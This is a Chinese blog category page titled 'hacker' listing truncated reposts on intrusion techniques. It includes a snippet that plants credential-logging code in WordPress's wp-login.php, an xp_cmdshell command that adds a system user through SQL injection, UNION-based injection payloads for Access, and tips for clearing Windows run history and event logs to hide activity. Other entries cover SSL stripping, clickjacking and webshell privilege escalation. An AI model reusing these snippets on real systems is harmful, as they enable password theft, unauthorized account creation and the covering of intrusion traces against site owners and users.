hacker
文章平均质量分 63
asli33
这个作者很懒,什么都没留下…
展开
-
IDA识别程序中密码算法插件 FindCrypt2
参见:http://www.openrce.org/downloads/details/189/FindCrypt2一个用于在IDA中识别反汇编后程序中所使用的密码学算法插件,支持的密码学算法有:* Blowfish* Camellia* CAST* CAST转载 2011-07-06 00:27:00 · 5243 阅读 · 0 评论 -
webshell下记录WordPress登陆密码
webshell下记录Wordpress登陆密码方便进一步社工Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。在文件wp-login.php中539行处添加: // log password $log_user=$_POST['log']; $log_pwd=$_POST['pwd']; $log_ip=$_SERVER["R转载 2012-08-14 17:02:45 · 1626 阅读 · 0 评论 -
How to clear windows run history
http://www.windows-commandline.com/2009/11/how-to-clear-windows-run-history.htmlWindows stores the list of the commands we have executed from Run window. This‘Run’ command history can be see转载 2012-03-30 12:27:57 · 896 阅读 · 0 评论 -
Backup / delete event log files
http://www.windows-commandline.com/2011/12/backup-delete-event-log-files.htmlWe can delete or backup event log files from command line using wmiccommands. The wmic sub command for managing eve转载 2012-03-30 12:29:08 · 619 阅读 · 0 评论 -
XP多用户登陆
1、关闭服务tasklist /svc | findstr /C:TermService,查看如果Terminal Services没有和其它服务共享svchost.exe进程则运行taskkill /F /PID process_id 关闭该进程即可,之后通过net start TermService重启服务如果Terminal Services与其它服务共享了这一进程,如原创 2012-03-30 12:26:52 · 630 阅读 · 0 评论 -
Access数据库注入高级玩法
http://ynhu33.blog.51cto.com/412835/259144Access数据库注入高级玩法,鉴于论坛的朋友要求,在这整理下,以飨读者。Access数据库想对于MsSql来说可谓小巫见大巫,但是Acc的数据库在目前国内还是有一定的市场,其注入也很灵活。相信你看完本文就会了解到Access也是很强大的。一,基础篇1、猜解表名,这里借用啊D的语句:and转载 2012-02-21 13:30:49 · 688 阅读 · 0 评论 -
winpcap静默安装小结
下面的内容基本上来自参考网站[1]、[2]、[3],做个小结免得到时候又要搜索。由于用了winpcap抓包,必须先安装它,又不想装两次exe因此考虑静默安装——silent install。1、从官方网站http://www.winpcap.org/archive/下载exe 我选用4.1.1-Winpcap.exe。2、使用7zip将exe解压,注意选择自动重命名。3转载 2012-02-27 18:23:41 · 1971 阅读 · 0 评论 -
Access SQL注入参考
Access SQL注入参考 描述SQL查询及注释注释符Access中没有专门的注释符号.因此"/*", "--"和"#"都没法使用.但是可以使用空字符"NULL"(%00)代替:' UNION SELECT 1,1,1 FROM validTableName%00语法错误信息"[Microsoft][Driver ODB翻译 2012-02-17 18:00:43 · 697 阅读 · 0 评论 -
利用系统表注入SQLServer数据库
SQL Server是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”-- 分号;在SQLServer中表示转载 2012-02-17 11:56:48 · 407 阅读 · 0 评论 -
注入过程中的中文处理方法
中文处理方法 在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解,“中文恐惧症”很快可以克服。 先说一点常识: Access中,中文的ASCII码可能会出现负数,取出该负数后用abs()取绝对值,汉字字符不变。 SQL Server中,中文的ASCII为正数,但由于是UNICODE的双位编码,不能转载 2012-02-15 12:58:46 · 393 阅读 · 0 评论 -
SQL注入常用函数
SQL注入常用函数 有SQL语言基础的人,在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。 Access:asc(字符) SQLServer:unicode(字符) 作用:返回某字符的ASCII码 Access:chr(数字) SQLServer:nchar(数字) 作用:与asc转载 2012-02-15 12:57:40 · 818 阅读 · 0 评论 -
注入中表格长度限制的突破
链接地址:http://www.5778.com/help/safe/safe2_3.htm在表格页上加一些限制,比如maxlength等等,攻击者可以突破sql注入攻击时输入框长度的限制.写一个SOCKET程序改变HTTP_REFERER?我不会。网上发表了这样一篇文章:------------len.reG----------------- Windows R转载 2012-02-15 12:43:15 · 624 阅读 · 0 评论 -
SQLServer与Access数据库的判别方法
不同的数据库的函数、注入方法都是有差异的,所以在注入之前,我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer,网上超过99%的网站都是其中之一。 怎么让程序告诉你它使用的什么数据库呢?来看看: SQLServer有一些系统变量,如果服务器IIS提示没关闭,并且SQLServer返回错误提示的话,那可以直接从出错信息获取,方法如下转载 2012-02-15 11:52:14 · 726 阅读 · 0 评论 -
nmap扫描时的2个小经验
From:Mickey 1.我肉鸡的环境是Windows XP sp3,在使用nmap扫描外网的时候,提示我pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter:转载 2011-08-16 16:56:00 · 1097 阅读 · 0 评论 -
伪造浏览器的状态栏--IE和FireFox的ClickJacking
方法一:先看下面一段代码:--------------------------------------------------------------------------------------------------------------<div转载 2011-08-03 16:43:29 · 540 阅读 · 0 评论 -
Backdoor Webserver using MySQL-SQL Injection
What is SQL Injection?SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing转载 2011-07-28 18:17:19 · 496 阅读 · 0 评论 -
SSL漏洞及其利用工具(SSL会话劫持)
各种安全会议都提到了SSL的问题。独立安全专家Moxie Marlinspike 用相当令人信服的证据解释了他是如何绕过SSL安全机制的。SSL漏洞利用的新工具 SSL Strip,让人们再次为 WiFi 和 洋葱代理网络的安全而担.SSL Strip (下称转载 2011-07-06 00:16:24 · 3011 阅读 · 0 评论 -
ASP WEBSHELL权限总结
文章作者:enterer博客:www.enterer.cn转载请保留我为什么会写这篇文章呢,当然是因为我很闲(误)。因为本人虽然是个菜鸟,学习也就4个多月,但是觉得应该写些东西和大家交流。本人是提权爱好者,虽然技术一般,但是有耐心些出来和大家交流交流。打算写个提权的系列文章,汗,本人也只是小白而已。提 权的基础是什么呢?拿到一个webshell,你最想干什么呢,当然是拿下服务器了。转载 2013-10-12 16:07:03 · 2808 阅读 · 0 评论